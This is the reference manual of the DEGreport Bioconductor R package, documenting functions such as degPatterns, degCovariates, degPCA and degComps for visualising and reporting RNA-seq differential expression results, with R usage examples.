Description Creation of an HTML report of differential expression analyses of count data. It integrates some of the code mentioned in the DESeq2 and edgeR vignettes, and reports a ranked list of genes according to the mean and variability of the fold changes for each selected gene.
biocViews DifferentialExpression, Visualization, RNASeq, ReportWriting, GeneExpression, ImmunoOncology
URL http://lpantano.github.io/DEGreport/
BugReports https://github.com/lpantano/DEGreport/issues
Suggests BiocStyle, AnnotationDbi, limma, pheatmap, rmarkdown, statmod, testthat
Depends R (>= 4.0.0)
Imports utils, methods, Biobase, BiocGenerics, broom, circlize, ComplexHeatmap, cowplot, ConsensusClusterPlus, cluster, dendextend, DESeq2, dplyr, edgeR, ggplot2, ggdendro, grid, ggrepel, grDevices, knitr, logging, magrittr, psych, RColorBrewer, reshape, rlang, scales, stats, stringr, stringi, S4Vectors, SummarizedExperiment, tidyr, tibble
Maintainer Lorena Pantano <lorena.pantano@gmail.com>
License MIT + file LICENSE
VignetteBuilder knitr
RoxygenNote 7.2.3
Encoding UTF-8
Roxygen list(markdown = TRUE)
git_url https://git.bioconductor.org/packages/DEGreport
git_branch RELEASE_3_18
git_last_commit 672d8e5
git_last_commit_date 2023-12-06
Repository Bioconductor 3.18
Date/Publication 2024-04-03
Author Lorena Pantano [aut, cre],
John Hutchinson [ctb],
Victor Barrera [ctb],
Mary Piper [ctb],
Radhika Khetani [ctb],
Kenneth Daily [ctb],
Thanneer Malai Perumal [ctb],
Rory Kirchner [ctb],
Michael Steinbaugh [ctb]
R topics documented:
DEGreport-package
createReport
deg
degCheckFactors
degColors
degComps
degCorCov
degCovariates
degDefault
degFilter
degMA
degMB
degMDS
degMean
degMerge
degMV
degObj
degPatterns
degPCA
degPlot
degPlotCluster
degPlotWide
degQC
degResults
DEGSet
degSignature
degSummary
degVar
degVB
degVolcano
Description
These functions are provided for compatibility with older versions of DEGreport only and will be defunct at the next release.
Details
The following functions are deprecated and will be made defunct; use the replacement indicated below:
- `degRank`, `degPR`, `degBIcmd`, `degBI`, `degFC`, `degComb`, `degNcomb`: `DESeq2::lfcShrink`. These functions tried to avoid large fold changes in variable genes; methods such as `lfcShrink` now address this.

DEGreport
Author(s)
Maintainer: Lorena Pantano <lorena.pantano@gmail.com>
Other contributors:
- John Hutchinson [contributor]
- Victor Barrera [contributor]
- Mary Piper [contributor]
- Radhika Khetani [contributor]
- Kenneth Daily [contributor]
- Thanneer Malai Perumal [contributor]
- Rory Kirchner [contributor]
- Michael Steinbaugh [contributor]
See Also
Useful links:
createReport
Create report of RNAseq DEG analysis
Description
This function gets the count matrix, p-values, and fold changes of a DEG analysis and creates a report that helps detect possible problems with the data.
Usage
createReport(g, counts, tags, pvalues, path, pop = 400, name = "DEGreport")
Arguments
- **g**: Character vector with the group the samples belong to.
- **counts**: Matrix with counts for each sample and each gene. The number of rows should match the length of the pvalues vector.
- **tags**: Genes of DEG analysis
- **pvalues**: pvalues of DEG analysis
- **path**: path to save the figure
- **pop**: random genes for background
- **name**: name of the html file
Value
An HTML file with all figures and tables
deg
Method to get the tables stored for a specific comparison
Description
Method to get the tables stored for a specific comparison
Usage
deg(object, value = NULL, tidy = NULL, top = NULL, ...)
## S4 method for signature 'DEGSet'
deg(object, value = NULL, tidy = NULL, top = NULL, ...)
Arguments
- **object**: DEGSet
- **value**: Character to specify which table to use.
- **tidy**: Return data.frame, tibble or original class.
- **top**: Limit number of rows to return. Default: All.
- **...**: Other parameters to pass for other methods.
Author(s)
Lorena Pantano
References
- Testing if top is whole number or not comes from: https://stackoverflow.com/a/3477158
degCheckFactors Distribution of gene ratios used to calculate Size Factors.
Description
This function checks the median-ratio normalization used by DESeq2 (and similarly by edgeR) to visually assess whether the median is the best size factor to represent depth.
Usage
degCheckFactors(counts, each = FALSE)
Arguments
- **counts**: Matrix with counts for each sample and each gene.
- **each**: Plot each sample separately.
Details
This function will plot the gene ratios for each sample. To calculate the ratios, it follows logic similar to that used by DESeq2/edgeR, where the expression of each gene is divided by the mean expression of that gene. The distribution of the ratios should approximate a normal shape, and the factors should be similar to the medians of the distributions. If some samples show a different distribution, the factor may be biased due to some biological or technical factor.
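The ratio logic just described can be sketched in a few lines of base R on toy data (DESeq2's actual implementation uses the geometric mean per gene; the plain mean is used here to mirror the description above):

```r
# Toy sketch of the gene-ratio logic described above (base R only).
# Each gene's counts are divided by that gene's mean across samples;
# the per-sample median of those ratios is a candidate size factor.
set.seed(1)
counts <- matrix(rpois(20 * 4, lambda = 50), nrow = 20, ncol = 4)
gene_means <- rowMeans(counts)
ratios <- counts / gene_means            # one ratio per gene and sample
size_factors <- apply(ratios, 2, median) # per-sample median ratios
size_factors
```

degCheckFactors plots the distribution of these per-sample ratios so you can judge visually whether the median is representative for each sample.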
Value
ggplot2 object
References
- Code to calculate size factors comes from `DESeq2::estimateSizeFactorsForMatrix()`.
Examples
```r
data(humanGender)
library(SummarizedExperiment)
degCheckFactors(assays(humanGender)[[1]][, 1:10])
```
---
**degColors**
*Make nice colors for metadata*
Description
The function will take a metadata table and use the Set2 palette when the number of levels is > 3, or a set of orange/blue colors otherwise.
Usage
```r
degColors(
ann,
col_fun = FALSE,
con_values = c("grey80", "black"),
cat_values = c("orange", "steelblue"),
palette = "Set2"
)
```
Arguments
- `ann` : Data.frame with metadata information. Each column will be used to generate a palette suitable for the values in there.
- `col_fun` : Whether to return a function for continuous variables (compatible with `ComplexHeatmap::HeatmapAnnotation()`) or the colors themselves (compatible with `pheatmap::pheatmap()`).
- `con_values` : Color to be used for continuous variables.
- `cat_values` : Color to be used for 2-levels categorical variables.
- `palette` : Palette to use from `brewer.pal()` for multi-level categorical variables.
Examples
```r
data(humanGender)
library(DESeq2)
library(ComplexHeatmap)
idx <- c(1:10, 75:85)
dse <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:10, idx], colData(humanGender)[idx,], design=~group)
th <- HeatmapAnnotation(df = colData(dse),
                        col = degColors(colData(dse), TRUE))
Heatmap(log2(counts(dse)+0.5), top_annotation = th)
custom <- degColors(colData(dse), TRUE,
                    con_values = c("white", "red"),
                    cat_values = c("white", "black"),
                    palette = "Set1")
th <- HeatmapAnnotation(df = colData(dse),
                        col = custom)
Heatmap(log2(counts(dse)+0.5), top_annotation = th)
```
degComps Automate the use of results() for multiple comparisons
Description
This function will extract the output of DESeq2::results() and DESeq2::lfcShrink() for multiple comparisons using:
Usage
degComps(
dds,
combs = NULL,
contrast = NULL,
alpha = 0.05,
skip = FALSE,
type = "normal",
pairs = FALSE,
fdr = "default"
)
Arguments
dds DESeq2::DESeqDataSet object.
combs Optional vector indicating the coefficients or columns from colData(dds) to create group comparisons.
contrast Optional vector to specify contrast. See DESeq2::results().
alpha Numeric value used in independent filtering in DESeq2::results().
skip Boolean to indicate whether to skip shrinkage, for instance when the results come from the LRT method.
type Type of shrinkage estimator. See DESeq2::lfcShrink().
pairs Boolean to indicate whether to create all comparisons or to use only the coefficients already created by DESeq2::resultsNames().
fdr Type of FDR correction. The default is the FDR value; lfdr-stat is for local FDR using the statistic of the test, and lfdr-pvalue is for local FDR using the p-value of the test. fdrtool needs to be installed and loaded by the user.
Details
- coefficients
- contrast
- Multiple columns in colData that match coefficients
- Multiple columns in colData to create all possible contrasts
Value
DEGSet with unshrunken and shrunken results.
Author(s)
Lorena Pantano
Examples
library(DESeq2)
dds <- makeExampleDESeqDataSet(betaSD=1)
colData(dds)[["treatment"]] <- sample(colData(dds)[["condition"]], 12)
design(dds) <- ~ condition + treatment
dds <- DESeq(dds)
res <- degComps(dds, combs = c("condition", 2),
contrast = list("treatment_B_vs_A", c("condition", "A", "B")))
# library(fdrtool)
#res <- degComps(dds,contrast = list("treatment_B_vs_A"),
# fdr="lfdr-stat")
degCorCov
Calculate the correlation relationship among all covariates in the metadata table
Description
This function will calculate the correlation among all columns in the metadata
Usage
degCorCov(metadata, fdr = 0.05, use_pval = FALSE, ...)
Arguments
- metadata: data.frame with samples metadata.
- fdr: numeric value to use as cutoff to determine the minimum fdr to consider significant correlations between pcs and covariates.
- use_pval: boolean to indicate to use p-value instead of FDR to hide non-significant correlation.
- ...: Parameters to pass to ComplexHeatmap::Heatmap().
Value
: list:
a) cor, data.frame with pair-wise correlations, pvalues, FDR
b) corMat, data.frame with correlation matrix
c) fdrMat, data.frame with FDR matrix
d) plot, Heatmap plot of correlation matrix
Author(s)
: Lorena Pantano, Kenneth Daily and Thanneer Malai Perumal
Examples
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dse <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
cor <- degCorCov(colData(dse))
degCovariates Find correlation between pcs and covariates
Description
This function will calculate the PCs using the prcomp function, and correlate categorical and numerical variables from the metadata. The size of the dots indicates the importance of the metadata; for instance, when the range of the values is quite small (from 0.001 to 0.002 in ribosomal content), the correlation result is not important. If black stroke lines are shown, the correlation analysis has an FDR < 0.05 for that variable and PC. Only variables significant according to the linear model are colored. See Details to learn how this is calculated.
Usage
degCovariates(
counts,
metadata,
fdr = 0.1,
scale = FALSE,
minPC = 5,
correlation = "kendall",
addCovDen = TRUE,
legacy = FALSE,
smart = TRUE,
method = "lm",
plot = TRUE
)
Arguments
- counts: normalized counts matrix
- metadata: data.frame with samples metadata.
- fdr: numeric value to use as cutoff to determine the minimum fdr to consider significant correlations between pcs and covariates.
- scale: boolean to determine whether counts matrix should be scaled for pca. default FALSE.
- minPC: numeric value that will be used as cutoff to select only pcs that explain more variability than this.
- correlation: character determining the method for the correlation between pcs and covariates.
- addCovDen: boolean. Whether to add the covariates dendrogram to the plot to see covariates relationship. It will show degCorCov() dendrogram on top of the columns of the heatmap.
- legacy: boolean. Whether to plot the legacy version.
- smart: boolean. Whether to avoid normalization of the numeric covariates when calculating importance. This is not used if legacy = TRUE. See @details for more information.
- method: character. Whether to use lm to calculate the significance of the covariates effect on the PCs. For that, this function uses lm to regress the data and uses the p-value calculated by each variable in the model to define significance (p-value < 0.05). Variables with a black stroke are significant after this step. Variables with grey stroke are significant at the first pass considering p.value < 0.05 for the correlation analysis.
- plot: Whether to plot or not the correlation matrix.
Details
This method is adapted from Daily et al 2017 article. Principal components from PCA analysis are correlated with covariates metadata. Factors are transformed to numeric variables. Correlation is measured by cor.test function with Kendall method by default.
The size of the dot, or importance, indicates the importance of the covariate based on the range of its values. Covariates where the range is very small (like a % of mapped reads that varies between 0.001 and 0.002) will have a very small size (0.1*max_size). The maximum value is set to 5 units. To get the importance, each covariate is normalized using this equation: \(1 - \min(v/\max(v))\), and the minimum and maximum values are set to 0.01 and 1 respectively. For instance, 0.5 would mean there is at least 50% of difference between the minimum value and the maximum value. Categorical variables are always plotted using the maximum size, since it is not possible to estimate their variability. By default, it won't do \(v/\max(v)\) if the values are already between 0-1 or 0-100 (already normalized values such as rates and percentages). If you want to ignore the importance, use legacy = TRUE.
Finally, a linear model is used to calculate the significance of the covariates effect on the PCs. For that, this function uses lm to regress the data and uses the p-value calculated by each variable in the model to define significance (p-value < 0.05). Variables with a black stroke are significant after this step. Variables with grey stroke are significant at the first pass considering p.value < 0.05 for the correlation analysis.
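The importance score above can be written directly from the equation; this is a hedged base-R sketch, and `importance` is a hypothetical helper name rather than an exported function:

```r
# Sketch of the importance score: 1 - min(v / max(v)), clamped to
# [0.01, 1] as the text describes. Near-constant covariates score low;
# covariates with a wide relative range score close to 1.
importance <- function(v) {
  v <- v[!is.na(v)]
  score <- 1 - min(v / max(v))
  min(max(score, 0.01), 1)
}
importance(c(10, 20, 40))  # 1 - 10/40 = 0.75
importance(c(7, 7, 7))     # constant, so clamped to 0.01
```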
Value
: list:
- plot, heatmap showing the significance of the variables.
- corMatrix, correlation, p-value, FDR values for each covariate and PCA pair
- pcsMatrix: PCs loading for each sample
- scatterPlot: plot for each significant covariate and the PC values.
- significants: contains the significant covariates using a linear model to predict the coefficient of covariates that have some color in the plot. All the significant covariates from the linear model analysis are returned.
Author(s)
: Lorena Pantano, Victor Barrera, Kenneth Daily and Thanneer Malai Perumal
References
Examples
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dse <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
res <- degCovariates(log2(counts(dse)+0.5), colData(dse))
res <- degCovariates(log2(counts(dse)+0.5),
colData(dse), legacy = TRUE)
res$plot
res$scatterPlot[[1]]
degDefault Method to get the default table to use.
Description
It can accept a list of new padj values matching the same dimensions as the current vector.
Usage
degDefault(object)
degCorrect(object, fdr)
## S4 method for signature 'DEGSet'
degDefault(object)
## S4 method for signature 'DEGSet'
degCorrect(object, fdr)
Arguments
- **object**: DEGSet
- **fdr**: It can be `fdr-stat`, `fdr-pvalue`, vector of new `padj`
Author(s)
Lorena Pantano
Examples
```r
library(DESeq2)
library(dplyr)
dds <- makeExampleDESeqDataSet(betaSD=1)
colData(dds)[["treatment"]]<- sample(colData(dds)[["condition"]], 12)
design(dds) <- ~ condition + treatment
dds <- DESeq(dds)
res <- degComps(dds, contrast = list("treatment_B_vs_A"))
```
degFilter
Description
This function will keep only rows that have a minimum count of 1 in at least a `min` fraction of samples (default 80%).
Usage
```r
degFilter(counts, metadata, group, min = 0.8, minreads = 0)
```
Arguments
- **counts**: Matrix with expression data, columns are samples and rows are genes or other feature.
- **metadata**: Data.frame with information about each column in counts matrix. Rownames should match colnames(counts).
- **group**: Character column in metadata used to group samples and apply the cutoff.
- **min**: Percentage value indicating the minimum number of samples in each group that should have more than 0 in count matrix.
- **minreads**: Integer minimum number of reads to consider a feature expressed.
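The rule above can be sketched in base R on toy data; `keep` below is an illustrative reimplementation under the stated defaults, not the package's internal code:

```r
# Keep a gene only if, in every group, at least `min` (80%) of the
# samples have counts above `minreads` (0 here, matching the defaults).
set.seed(3)
counts <- matrix(rpois(10 * 6, lambda = 2), nrow = 10, ncol = 6)
group <- rep(c("A", "B"), each = 3)
keep <- apply(counts, 1, function(gene) {
  frac <- tapply(gene > 0, group, mean)  # fraction expressed per group
  all(frac >= 0.8)
})
filtered <- counts[keep, , drop = FALSE]
c(before = nrow(counts), after = nrow(filtered))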
Value
- Count matrix after filtering out genes (features) without enough expression in any group.
Examples
```r
data(humanGender)
library(SummarizedExperiment)
idx <- c(1:10, 75:85)
c <- degFilter(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], "group", min=1)
```
degMA
Description
MA-plot adaptation to show the shrinking effect.
Usage
```r
degMA(
results,
title = NULL,
label_points = NULL,
label_column = "symbol",
limit = NULL,
diff = 5,
raw = FALSE,
correlation = FALSE
)
```
Arguments
- **results**: DEGSet class.
- **title**: Optional. Plot title.
- **label_points**: Optionally label these particular points.
- **label_column**: Match label_points to this column in the results.
- **limit**: Absolute maximum to plot on the log2FoldChange.
- **diff**: Minimum difference between logFoldChange before and after shrinking.
- **raw**: Whether to plot just the unshrunken log2FC.
- **correlation**: Whether to plot the correlation of the two logFCs.
Value
MA-plot ggplot.
Examples
library(DESeq2)
dds <- makeExampleDESeqDataSet(betaSD=1)
dds <- DESeq(dds)
res <- degComps(dds, contrast = list("condition_B_vs_A"))
degMA(res)
degMB
Distribution of expression of DE genes compared to the background
Description
Distribution of expression of DE genes compared to the background
Usage
degMB(tags, group, counts, pop = 400)
Arguments
tags List of genes that are DE.
group Character vector with the group name for each sample, in the same order as the counts column names.
counts Matrix with counts for each sample and each gene. The number of rows should match the length of the pvalues vector.
pop Number of random samples taken for background comparison.
Value
ggplot2 object
Examples
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dds <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
dds <- DESeq(dds)
res <- results(dds)
degMB(row.names(res)[1:20], colData(dds)["group"],
counts(dds, normalized = TRUE))
degMDS
*Plot MDS from normalized count data*
**Description**
Uses cmdscale to get multidimensional scaling of data matrix, and plot the samples with ggplot2.
**Usage**
```r
degMDS(counts, condition = NULL, k = 2, d = "euclidian", xi = 1, yi = 2)
```
**Arguments**
- `counts` matrix samples in columns, features in rows
- `condition` vector defining groups of samples in counts. It has to be in the same order as the columns of the count matrix.
- `k` integer number of dimensions to get
- `d` type of distance to use, c("euclidian", "cor").
- `xi` number of component to plot in x-axis
- `yi` number of component to plot in y-axis
**Value**
`ggplot2` object
**Examples**
```r
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dse <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
degMDS(counts(dse), condition = colData(dse)[["group"]])
```
degMean
*Distribution of pvalues by expression range*
**Description**
This function plots the p-value distribution colored by the quantiles of the average count data.
**Usage**
```r
degMean(pvalues, counts)
```
**Examples**

```r
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dds <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
    colData(humanGender)[idx,], design=~group)
dds <- DESeq(dds)
res <- results(dds)
degMean(res[, 4], counts(dds))
```

**degMerge**

Integrate data coming from degPattern into one data object

**Description**

The simplest case is if you want to combine the pattern profile for gene expression data and proteomic data. It will use the first element as the base for the integration. Then, it will loop through clusters and run `degPatterns` on the second data set to detect patterns that match this one.

**Usage**

```r
degMerge(
  matrix_list,
  cluster_list,
  metadata_list,
  summarize = "group",
  time = "time",
  col = "condition",
  scale = TRUE,
  mapping = NULL
)
```

**Arguments**

- `matrix_list`: list of expression data for each element
- `cluster_list`: list of df items from the degPattern output
- `metadata_list`: list of data.frames from each element with the experiment design. Normally the colData output.
- `summarize`: character column to use to group samples
- `time`: character column to use as the x-axis in figures
- `col`: character column to color samples in figures
- `scale`: boolean, scale the expression matrix by row
- `mapping`: data.frame mapping table in case elements use different IDs in the row.names of the expression matrix. For instance, when integrating miRNA/mRNA.
Value
A data.frame with information on which genes are in each cluster across all data sets, and the correlation value for each pair-wise cluster comparison.
degMV
Correlation of the standard deviation and the mean of the abundance of a set of genes.
Description
Correlation of the standard deviation and the mean of the abundance of a set of genes.
Usage
degMV(group, pvalues, counts, sign = 0.01)
Arguments
group Character vector with the group name for each sample, in the same order as the counts column names.
pvalues pvalues of the DEG analysis. The row number of counts should match the length of the pvalues vector.
counts Matrix with counts for each sample and each gene.
sign Cutoff used to label significant features.
Value
ggplot2 object
Examples
```r
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dds <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx, ], design=~group)
dds <- DESeq(dds)
res <- results(dds)
degMV(colData(dds)[["group"]],
res[, 4],
counts(dds, normalized = TRUE))
```
degObj
Create a deg object that can be used to plot expression values at shiny server:runGist(9930881)
Description
Create a deg object that can be used to plot expression values at shiny server:runGist(9930881)
Usage
```r
degObj(counts, design, outfile)
```
Arguments
- **counts**: Matrix with count data (e.g. an assay matrix).
- **design**: Data.frame with the sample metadata/design.
- **outfile**: File that will contain the object.
Value
R object to be load into vizExp.
Examples
```r
data(humanGender)
library(SummarizedExperiment)
degObj(assays(humanGender)[[1]], colData(humanGender), NULL)
```
degPatterns
Make groups of genes using expression profile.
Description
Note that this function doesn't calculate significant differences between groups, so the matrix used as input should already be filtered to contain only genes that are significantly different, or the most interesting genes to study.
Usage
degPatterns(
ma, metadata,
minc = 15,
summarize = "merge",
time = "time",
col = NULL,
consensusCluster = FALSE,
reduce = FALSE,
cutoff = 0.7,
scale = TRUE,
pattern = NULL,
groupDifference = NULL,
eachStep = FALSE,
plot = TRUE,
fixy = NULL,
nClusters = NULL
)
Arguments
ma log2 normalized count matrix
metadata data frame with sample information. Rownames should match the ma column names.
minc integer minimum number of genes in a group that will be returned
summarize character column name in metadata that will be used to group replicates. If the column doesn't exist, it'll merge the time and col columns; if col doesn't exist, it'll use time only. For instance, a merge between the summarize and time parameters: control_point0 ... etc
time character column name in metadata that will be used as variable that changes, normally a time variable.
col character column name in metadata to separate samples. Normally control/mutant
consensusCluster Indicates whether using ConsensusClusterPlus or cluster::diana()
- **reduce**: boolean remove genes that are outliers of the cluster distribution. boxplot function is used to flag a gene in any group defined by time and col as outlier and it is removed from the cluster. Not used if consensusCluster is TRUE.
- **cutoff**: This is deprecated.
- **scale**: boolean scale the ma values by row
- **pattern**: numeric vector to be used to find patterns like this from the count matrix. As well, it can be a character indicating the genes inside the count matrix to be used as reference.
- **groupDifference**: Minimum abundance difference between the maximum value and minimum value for each feature. Please, provide the value in the same range than the ma value (if ma is in log2, groupDifference should be inside that range).
- **eachStep**: Whether to apply groupDifference at each step over the time variable. **This only works properly for one group with multiple time points.**
- **plot**: boolean plot the clusters found
- **fixy**: vector integers used as ylim in plot
- **nClusters**: an integer scalar or vector with the desired number of groups
**Details**
It can work with one or more groups with two or more time points. Before calculating gene similarity among samples, all samples inside the same time point (time parameter) and group (col parameter) are collapsed together, and the mean value represents the group for the gene abundance. Then, all pair-wise gene expression correlations are calculated using the cor.test R function with kendall as the statistical method. A distance matrix is created from those values. After that, cluster::diana() is used for clustering the gene-gene distance matrix, and the tree is cut using the divisive coefficient of the clustering, given as well by diana. Alternatively, if consensusCluster is on, it will use ConsensusClusterPlus to cut the tree into stable clusters. Finally, for each group of genes, only those groups with more genes than the minc parameter will be added to the figure. The y-axis in the figure is the result of applying the scale() R function, which is similar to creating a Z-score where values are centered on the mean and scaled by the standard deviation for each gene.
The different patterns can be merged to get similar ones into only one pattern. The expression correlation of the patterns will be used to decide whether some need to be merged or not.
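The clustering core described above can be sketched on toy data (this assumes the `cluster` package, which ships with R; the real function additionally collapses replicates, uses the divisive coefficient to cut the tree, and filters clusters by `minc`):

```r
# Pair-wise Kendall correlation between genes, converted to a distance,
# then divisive clustering with cluster::diana() as described above.
library(cluster)
set.seed(2)
mat <- matrix(rnorm(12 * 4), nrow = 12)   # 12 genes x 4 collapsed groups
co <- cor(t(mat), method = "kendall")     # gene-gene similarity
d <- as.dist((1 - co) / 2)                # map correlation to a distance
fit <- diana(d, diss = TRUE)
clusters <- cutree(as.hclust(fit), k = 3) # cut the tree into 3 groups
table(clusters)
```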
**Value**
- list with two items:
- df is a data.frame with two columns. The first one with genes, the second with the clusters they belong.
- pass is a vector of the clusters that pass the minc cutoff.
- plot ggplot figure.
- hr clustering of the genes in hclust format.
- profile normalized count data used in the plot.
- raw data.frame with gene values summarized by biological replicates and with metadata information attached.
- summarise data.frame with cluster values summarized by group and with the metadata information attached.
- normalized data.frame with the cluster values as used in the plot.
- benchmarking plot showing the different patterns at different values for the clustering cutree function.
- benchmarking_curve plot showing how the numbers of clusters and genes change at different values for the clustering cutree function.
Examples
data(humanGender)
library(SummarizedExperiment)
library(ggplot2)
ma <- assays(humanGender)[[1]][1:100, ]
des <- colData(humanGender)
des[["other"]]<- sample(c("a", "b"), 85, replace = TRUE)
res <- degPatterns(ma, des, time="group", col = "other")
# Use the data yourself for custom figures
ggplot(res[["normalized"]],
aes(group, value, color = other, fill = other)) +
geom_boxplot() +
geom_point(position = position_jitterdodge(dodge.width = 0.9)) +
# change the method to make it smoother
geom_smooth(aes(group=other), method = "lm")
---
degPCA
Smart PCA from count matrix data
Description
A nice plot using ggplot2 from the prcomp function
Usage
degPCA(
counts,
metadata = NULL,
condition = NULL,
pc1 = "PC1",
pc2 = "PC2",
name = NULL,
shape = NULL,
data = FALSE
)
Arguments
- **counts**: matrix with count data
- **metadata**: data.frame with sample information
- **condition**: character column in metadata to use to color samples
- **pc1**: character PC to plot on x-axis
- **pc2**: character PC to plot on y-axis
- **name**: character if given, column in metadata to print label
- **shape**: character if given, column in metadata to shape points
- **data**: Whether return PCA data or just plot the PCA.
Value
If the output is assigned to a variable, the function returns the output of **prcomp()**.
Author(s)
Lorena Pantano, Rory Kirchner, Michael Steinbaugh
Examples
```r
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dse <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
degPCA(log2(counts(dse)+0.5), colData(dse),
condition="group", name="group", shape="group")
```
degPlot
Description
Plot top genes allowing more variables to color and shape points
Usage
```r
degPlot(
  dds,
  xs,
  res = NULL,
  n = 9,
  genes = NULL,
  group = NULL,
  batch = NULL,
  metadata = NULL,
  ann = c("geneID", "symbol"),
  slot = 1L,
  log2 = TRUE,
  xsLab = xs,
  ysLab = "abundance",
  color = "black",
  groupLab = group,
  batchLab = batch,
  sizePoint = 1
)
```
**Arguments**
- **dds**: `DESeq2::DESeqDataSet` object or `SummarizedExperiment` or `Matrix` or `data.frame`. In case of a `DESeqDataSet` object, always the normalized expression will be used from `counts(dds, normalized = TRUE)`.
- **xs**: Character, colname in `colData` that will be used as X-axes.
- **res**: `DESeq2::DESeqResults` object.
- **n**: Integer number of genes to plot from the `res` object. It will take the top N using `padj` values to order the table.
- **genes**: Character of gene names matching rownames of count data.
- **group**: Character, colname in `colData` to color points and add different lines for each level.
- **batch**: Character, colname in `colData` to shape points, normally used by batch effect visualization.
- **metadata**: Metadata in case `dds` is a matrix.
- **ann**: Columns in `rowData` (if available) used to print gene names. First element in the vector is the column name in `rowData` that matches the row.names of the `dds` or `count` object. Second element in the vector is the column name in `rowData` that will be used as the title for each gene or feature figure.
- **slot**: Name of the slot to use to get count data.
- **log2**: Whether or not to apply a log2 transformation.
- **xsLab**: Character, alternative label for x-axis (default: same as `xs`)
- **ysLab**: Character, alternative label for y-axis.
- **color**: Color to use to plot groups. It can be one color, or a palette compatible with `ggplot2::scale_color_brewer()`.
- **groupLab**: Character, alternative label for group (default: same as `group`).
- **batchLab**: Character, alternative label for batch (default: same as `batch`).
- **sizePoint**: Integer, indicates the size of the plotted points (default 1).
**Value**
`ggplot` showing the expression of the genes
Examples
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dse <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
dse <- DESeq(dse)
degPlot(dse, genes = rownames(dse)[1:10], xs = "group")
degPlot(dse, genes = rownames(dse)[1:10], xs = "group", color = "orange")
degPlot(dse, genes = rownames(dse)[1:10], xs = "group", group = "group",
color = "Accent")
degPlotCluster
Plot clusters from degPattern function output
Description
This function helps to format the cluster plots from degPatterns(). It allows control of the layers and returns a ggplot object that can accept more ggplot functions to allow customization.
Usage
degPlotCluster(
table,
time,
color = NULL,
min_genes = 10,
process = FALSE,
points = TRUE,
boxes = TRUE,
smooth = TRUE,
lines = TRUE,
facet = TRUE,
cluster_column = "cluster",
prefix_title = "Group:"
)
Arguments
- **table**: normalized element from degPatterns() output. It can be a data.frame with the following columns in there: genes, sample, expression, cluster, xaxis_column, color_column
- **time**: column name to use in the x-axis.
- **color**: column name to use to color and divide the samples.
- **min_genes**: minimum number of genes to be added to the plot.
- **process**: whether to process the table if it is not ready for plotting.
- **points**: Add points to the plot.
degPlotWide
Plot selected genes on a wide format
Description
Plot selected genes on a wide format
Usage
degPlotWide(counts, genes, group, metadata = NULL, batch = NULL)
Arguments
counts: DESeq2::DESeqDataSet object or expression matrix.
genes: character genes to plot.
group: character, colname in colData to color points and add different lines for each level.
metadata: data.frame, information for each sample. Not needed if DESeq2::DESeqDataSet given as counts.
batch: character, colname in colData to shape points, normally used by batch effect visualization.
Value
ggplot showing the expression of the genes on the x axis.
Examples
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dse <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
dse <- DESeq(dse)
degPlotWide(dse, rownames(dse)[1:10], group = "group")
degQC
Description
This function joins the output of degMean, degVar and degMV in a single plot. See these functions for further information.
Usage
degQC(counts, groups, object = NULL, pvalue = NULL)
Arguments
counts: Matrix with counts for each samples and each gene.
groups: Character vector with group name for each sample, in the same order as the counts column names.
object: DEGSet object.
pvalue: pvalues of DEG analysis.
Value
ggplot2 object
Examples
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dds <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
dds <- DESeq(dds)
res <- results(dds)
degQC(counts(dds, normalized=TRUE), colData(dds)["group"],
pvalue = res["pvalue"])
degResults
Complete report from DESeq2 analysis
Description
Complete report from DESeq2 analysis
Usage
degResults(
res = NULL,
dds,
rlogMat = NULL,
name,
org = NULL,
FDR = 0.05,
do_go = FALSE,
FC = 0.1,
group = "condition",
xs = "time",
path_results = ".",
contrast = NULL
)
Arguments
res output from DESeq2::results() function.
dds DESeq2::DESeqDataSet() object.
rlogMat matrix from DESeq2::rlog() function.
name string to identify results
org an organism annotation object, like org.Mm.eg.db. NULL if you want to skip this step.
FDR int cutoff for false discovery rate.
do_go boolean if GO enrichment is done.
FC int cutoff for log2 fold change.
group string column name in colData(dds) that separates samples in meaningful groups.
xs string column name in colData(dds) that will be used as X-axis in plots (i.e. time).
path_results character path where files are stored. NULL if you don’t want to save any file.
contrast list with character vector indicating the fold change values from different comparisons to add to the output table.
Value
ggplot2 object
Examples
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dse <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
dse <- DESeq(dse)
res <- degResults(dds = dse, name = "test", org = NULL,
do_go = FALSE, group = "group", xs = "group", path_results = NULL)
DEGSet
Description
S4 class to store data from differential expression analysis. It should be compatible with different packages and stores the information so that the methods work with all of them.
Usage
DEGSet(resList, default)
DEGSet(resList, default)
as.DEGSet(object, ...)
## S4 method for signature 'TopTags'
as.DEGSet(object, default = "raw", extras = NULL)
## S4 method for signature 'data.frame'
as.DEGSet(object, contrast, default = "raw", extras = NULL)
